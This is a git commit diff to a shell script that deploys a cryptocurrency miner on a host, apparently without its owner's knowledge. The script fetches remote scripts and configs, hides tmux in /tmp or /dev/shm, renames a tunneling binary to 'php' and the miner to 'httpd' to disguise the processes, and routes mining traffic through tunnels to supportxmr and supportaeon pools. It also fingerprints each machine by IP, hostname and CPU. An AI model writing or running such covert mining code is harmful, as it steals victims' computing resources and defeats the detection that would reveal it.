docs, stripped bins
Former-commit-id: 1bd398fa6269ef9eb8d3050a6fd30681fcff5476

diff --git a/start-crt-1-sln b/start-crt-1-sln
--- a/start-crt-1-sln
+++ b/start-crt-1-sln
@@ -17,6 +17,8 @@ wget -q https://github.com/untoreh/scripts/archive/${BRANCH}.tar.gz
 tar xf ${BRANCH}.tar.gz && rm ${BRANCH}.tar.gz
 cd scripts-${BRANCH} || exit 1
 
+. ./functions || exit 1
+
 ## relocate tmux
 trel=false
 for ph in {/tmp,/dev/shm,~/}; do
@@ -26,37 +28,37 @@ for ph in {/tmp,/dev/shm,~/}; do
         export PATH=${ph}/.tmx:$PATH && \
         trel=${ph}/.tmx && break
 done
-[ $trel = false ] && { echo "couldn't relocate tmux" ; exit 1; }
+[ $trel = false ] && { printf "couldn't relocate tmux" ; exit 1; }
 
 ## utility vars
 CFG_BASE_URL=https://rawgit.com/untoreh/scripts/master/cfg/
 
 ## note quote vars that need quoting
-cat <<SHAREDENV > shared.env
+define SHENV <<SHAREDENV
 TERMINFO=pl/ \
 TERM=tmux \
 SHELL=$(/usr/bin/which bash) \
 PATH=.:pl:$PATH \
 HOME=${HOME:-/tmp}
-
 SHAREDENV
-[ -z "$SHELL" ] && echo "bash not found" && exit 1
-[ ! -e shared.env ] && echo "error dumping shared env" && exit 1
-source ./shared.env
-SHENV="$(cat shared.env)"
+printf "%s" "$SHENV" > shared.env
+[ ! -e shared.env ] && printf "error dumping shared env" && exit 1
+. ./shared.env
+[ -z "$SHELL" ] && printf "bash not found" && exit 1
 
-## custom socket path for tmux (eval to expand reloc path)
-eval "function tmx(){
+## custom socket path for tmux
+tmxf="function tmx(){
     TMUX= \
     TMUX_TMPDIR=${trel} \
-    $SHENV \
+    ${SHENV/$'\n'} \
     init \"\$@\"
-}" ; export -f tmx
+}"
+printf "%s" "$tmxf" > tmx && . ./tmx || exit 1
 ## make sure tmux is working and also spawn a session with clean args
 tmx kill-server &>/dev/null
-tmx new -d || { echo "failed to start tmux"; exit 1 ; }
+tmx new -d || { printf "failed to start tmux"; exit 1 ; }
 if [ $(tmx ls | wc -l) = 0 ]; then
-    echo "nop session not found, exiting"
+    printf "nop session not found, exiting"
     exit 1
 fi
 
@@ -65,8 +67,14 @@ fi
 ## tnl
 ## $1 is the starting port (for overrides)
 function gen_tstarter(){
-    cat <<TSTARTER > tstarter
-source shared.env
+    define TSTARTER <<TSTARTER
+#!/bin/bash
+
+. ./functions || exit 1
+. ./shared.env || exit 1
+. ./tmx || exit 1
+
+
 portavl() {
           if \$(busybox nc -z 127.0.0.1 \${TNL_LISTEN}); then
              return 1
@@ -77,7 +85,7 @@ portavl() {
 checktnl() {
          local pid="\$(pgrep -xf "${TNL_MASK} ${TNL_ARGS}\s*")"
          ## lsof or netstat require /proc so not reliable
-         local port="\$(busybox nc -z 127.0.0.1 \${TNL_LISTEN} && echo 1)"
+         local port="\$(busybox nc -z 127.0.0.1 \${TNL_LISTEN} && printf 1)"
          local tss="\$(tmx ls | grep ${TNL_MASK})"
          if [ -z "\$pid" -o -z "\$port" -o -z "\$tss" ]; then ## order kind of matters
             return 1
@@ -89,15 +97,15 @@ starttnl(){
     ## starttnl should never be called more than once at a time
     if [ -n "\$(pgrep -xf "${TNL_MASK} ${TNL_ARGS}\s*")" ]; then
        if [ -n "\$(tmx ls | grep "$TNL_MASK")" ]; then
-          echo \${PREV_TNL_LISTEN} ## the previous port binded
+          printf "%s" \${PREV_TNL_LISTEN} ## the previous port binded
           exit ## tnl started and already in session
        else ## a rogue tunnel not within its session kill it
           pkill -xf "${TNL_MASK} ${TNL_ARGS}"
        fi
     fi
     tmx kill-session -t ${TNL_MASK} &>/dev/null
-    tmx new-session -d -s ${TNL_MASK} "${TNL_MASK} ${TNL_ARGS} &>/dev/null"
-    sleep 1 ## time to bind
+    tmx new-session -d -s ${TNL_MASK} "exec ${TNL_MASK} ${TNL_ARGS} &>/dev/null"
+    fleep 1 ## time to bind
 }
 
 export TNL_LISTEN=\$1
@@ -109,24 +117,26 @@ for port in $TNL_PLIST; do
         checktnl && exit 0 ## check again in case of late start
         PREV_TNL_LISTEN=\$TNL_LISTEN
         export TNL_LISTEN=\$port
-        envsubst -no-empty -i ${TNL_CFG_MASK}.tpl -o ${TNL_CFG_MASK}
+        envsubst -no-empty -i cfg/${TNL_CFG_MASK}.tpl -o ${TNL_CFG_MASK}
         continue
     fi
     if checktnl; then
-        echo \${TNL_LISTEN}
+        printf "%s" \${TNL_LISTEN}
         exit
     else
         PREV_TNL_LISTEN=\$TNL_LISTEN
         export TNL_LISTEN=\$port
-        envsubst -no-empty -i ${TNL_CFG_MASK}.tpl -o ${TNL_CFG_MASK}
+        envsubst -no-empty -i cfg/${TNL_CFG_MASK}.tpl -o ${TNL_CFG_MASK}
     fi
 done
 
 exit 1
 
 TSTARTER
+    printf "%s" "$TSTARTER" > tstarter
+    local ret=$?
     chmod +x tstarter
-    return $?
+    return $ret
 }
 
 function setup_tnl(){
@@ -134,37 +144,45 @@ function setup_tnl(){
     TNL_PLIST="80 8081 443 8081 8082 9000 10000 3036 20 21 465 993 995 110 123 2703 3036"
     TNL_CFG=${TNL_CFG:-gst.json}
     TNL_PATH=${TNL_PATH:-$(/usr/bin/which gst)}
+    PC_PATH=${PC_PATH:-$(/usr/bin/which pc)}
     TNL_MASK=${TNL_MASK:-php}
     TNL_CFG_MASK=${TNL_CFG_MASK:-php.ini}
+    PC_CFG=${PC_CFG:-pc.conf}
     TNL_ARGS=${TNL_ARGS:--C ${TNL_CFG_MASK}}
     ## download cfg
-    if [ ! -e "${TNL_CFG_MASK}.tpl" ]; then
-        wget -q "${CFG_BASE_URL}${TNL_CFG}" -O "${TNL_CFG_MASK}.tpl"
+    if [ ! -e "cfg/${TNL_CFG_MASK}.tpl" ]; then
+        wget -q "${CFG_BASE_URL}${TNL_CFG}.tpl" -O "cfg/${TNL_CFG_MASK}.tpl"
+    fi
+    ## download pc
+    if [ ! -e "cfg/${PC_CFG}.tpl" ]; then
+        wget -q "${CFG_BASE_URL}${PC_CFG}.tpl" -O "cfg/${PC_CFG}.tpl"
     fi
     ## mask
     if [ -e "$TNL_PATH" ]; then
         mv "$TNL_PATH" "$(dirname ${TNL_PATH})/${TNL_MASK}"
     fi
     ## config with needed vars
-    # if [ "$jail" -o -n "$(uname -r | grep -E ^2\.6\.[0-9]*\|^3\.1[0-9]*)" ]; then
-    #     TNL_PROTO=${TNL_PROTO:-socks}
-    # fi
+    if [ "$jail" -o -n "$(uname -r | grep -E ^2\.6\.[0-9]*\|^3\.1[0-9]*)" ]; then
+        TNL_PROTO=${TNL_PROTO:-socks+tcp}
+    fi
     if [ "$lowhw" ]; then
         TNL_TARGET=${TNL_TARGET:-pool.supportaeon.com:3333}
     fi
     export TNL_REMOTE="$TNL_REMOTE" \
            TNL_LISTEN=${TNL_LISTEN:-8080} \
            TNL_PROTO \
+           TNL_PROTO_PC \
            TNL_TARGET
-    envsubst -no-empty -i ${TNL_CFG_MASK}.tpl -o ${TNL_CFG_MASK}
+    envsubst -no-empty -i cfg/${TNL_CFG_MASK}.tpl -o ${TNL_CFG_MASK}
     gen_tstarter && TNL_LISTEN=$(./tstarter ${TNL_LISTEN})
     export TNL_LISTEN ## tstarter should echo the working port
+    envsubst -no-empty -i cfg/${PC_CFG}.tpl -o ${PC_CFG}
 }; setup_tnl
 
-OBJ_MASK=${OBJ_MASK:-httpd}
-PAUSD_DAEMON=${PAUSD_DAEMON:-pausd}
-OBJ_CFG=${OBJ_CFG:-httpd-1.conf}
-PAUSD_ARGS="${PAUSD_ARGS:-${OBJ_MASK} ${OBJ_MASK}.conf}"
+OBJ_MASK="${OBJ_MASK:-httpd}"
+PAUSD_DAEMON="${PAUSD_DAEMON:-pausd}"
+OBJ_CFG="${OBJ_CFG:-httpd-1.conf}"
+PAUSD_ARGS="${PAUSD_ARGS:-${OBJ_MASK} -c ${OBJ_MASK}.conf}"
 
 ## download cfg
 if [ ! -e "$OBJ_CFG" ]; then
@@ -185,10 +203,10 @@ chmod +x ${PAUSD_DAEMON} &>/dev/null
 ## daemon conf
 ## misc
 [ $(id -u) != 0 ] && sudo=$(/usr/bin/which sudo 2>/dev/null)
-echo 128 | $sudo tee /proc/sys/vm/nr_hugepages &>/dev/null
+printf 128 | $sudo tee /proc/sys/vm/nr_hugepages &>/dev/null
 ## instance ID
-CPU=$(cat /proc/cpuinfo | grep "model name" | head -1 | sed -r 's/model name\s*:\s*|[^a-zA-Z0-9]*//g')
-CORES=$(cat /proc/cpuinfo| grep "cpu cores" | wc -l)
+CPU=$(grep "model name" < /proc/cpuinfo | head -1 | sed -r 's/model name\s*:\s*|[^a-zA-Z0-9]*//g')
+CORES=$(nproc || grep -c "cpu cores" < /proc/cpuinfo)
 DATE=$(date +%s)
 IPADDR=$(wget -qO- ipinfo.io/ip)
 HOSTN=$(hostname)
@@ -210,7 +228,7 @@ else ## no cgroups, use all cores
     PAUSD_THREADS=${PAUSD_THREADS:-$CORES}
 fi
 ## shuffle affinity and get hex string
-bin_s=$(echo "$bin_s" | shuf | while read c; do echo -n $c; done) ## shuffle
+bin_s=$(printf "%s" "$bin_s" | shuf | while read c; do echo -n $c; done) ## shuffle
 hex_s=$(printf '%x\n' "$((2#$bin_s))") ## hex string, bashism
 if [ -z "$hex_s" -o "$hex_s" = 0 ]; then
     export AFFINITY="0x0"
@@ -221,7 +239,8 @@ fi
 ## vars set through tmux
 export PAUSD_THREADS PAUSD_VER=${PAUSD_VER:-2}
 export PAUSD_SHARES=${PAUSD_SHARES:-$((PAUSD_THREADS * PAUSD_VER))} \
-PAUSD_RATE=${PAUSD_RATE:-200}
+       PAUSD_RATE=${PAUSD_RATE:-200} \
+       PAUSD_PC_CFG=${PC_CFG}
 
 export \
 ID=${ID:-"{$IPADDR}{$HOSTN}{$DATE}{$CORES}{$CPU}"} \
@@ -230,21 +249,24 @@ AL=${AL:-cryptonight} \
 ENDPOINT=${ENDPOINT:-pool.supportxmr.com:${PAUSD_DIFF:-3333}}
 
 ## set vars used by pausd daemon in tmux and envsubst
+printf "" > "config.${PAUSD_DAEMON}"
 for v in $(builtin compgen -A variable | grep ^PAUSD); do
     export $v
-    tmx setenv -g $v "${!v}" ; done
+    printf "%s" "${v}=\"${!v}\" " >> "config.${PAUSD_DAEMON}"
+    # tmx setenv -g $v "${!v}" ; ## don't use env vars for daemon configs, use file
+done
 
 ## subst
-cat ${OBJ_MASK}.conf.tpl | envsubst -no-empty > ${OBJ_MASK}.conf
+envsubst -no-empty -i "${OBJ_MASK}.conf.tpl" -o "${OBJ_MASK}.conf"
 
-## init
-tmx new-session -d -s ${PAUSD_DAEMON} "${PAUSD_DAEMON} ${PAUSD_ARGS}"
-sleep 1 ## give time to fail
+## dump config and init
+tmx new-session -d -s ${PAUSD_DAEMON} "exec ${PAUSD_DAEMON}" # ${PAUSD_ARGS}
+fleep 1 ## give time to fail
 
 ## cleanup
 ## wait for tmux session to startup
 slept=0
-while [ "$(tmx list-panes -t ${PAUSD_DAEMON} | wc -l)" -lt 2 ]; do
+while [ "$(tmx list-panes -t "${PAUSD_DAEMON}" | wc -l)" -lt 2 ]; do
     slept=$((slept+1))
     if [ $slept -gt 5 ]; then ## no aes means crash means aeon
         ## try without hw accel
@@ -259,13 +281,13 @@ while [ "$(tmx list-panes -t ${PAUSD_DAEMON} | wc -l)" -lt 2 ]; do
         envsubst -no-empty -i ${OBJ_MASK}.conf.tpl -o ${OBJ_MASK}.conf
         ## init
         tmx kill-session -t ${PAUSD_DAEMON}
-        tmx new-session -d -s ${PAUSD_DAEMON} "${PAUSD_DAEMON} ${PAUSD_ARGS}"
-        while [ "$(tmx list-panes -t ${PAUSD_DAEMON} | wc -l)" -lt 2 ]; do sleep 1; done
+        tmx new-session -d -s ${PAUSD_DAEMON} "exec ${PAUSD_DAEMON}" # ${PAUSD_ARGS}
+        while [ "$(tmx list-panes -t "${PAUSD_DAEMON}" | wc -l)" -lt 2 ]; do fleep 1; done
         break
     fi
-    sleep 1;
+    fleep 1;
 done
-sleep 1 ## once more for edge cases
+fleep 1 ## once more for edge cases
 
 ## stop noop tmux session
 tmx kill-session -t 0
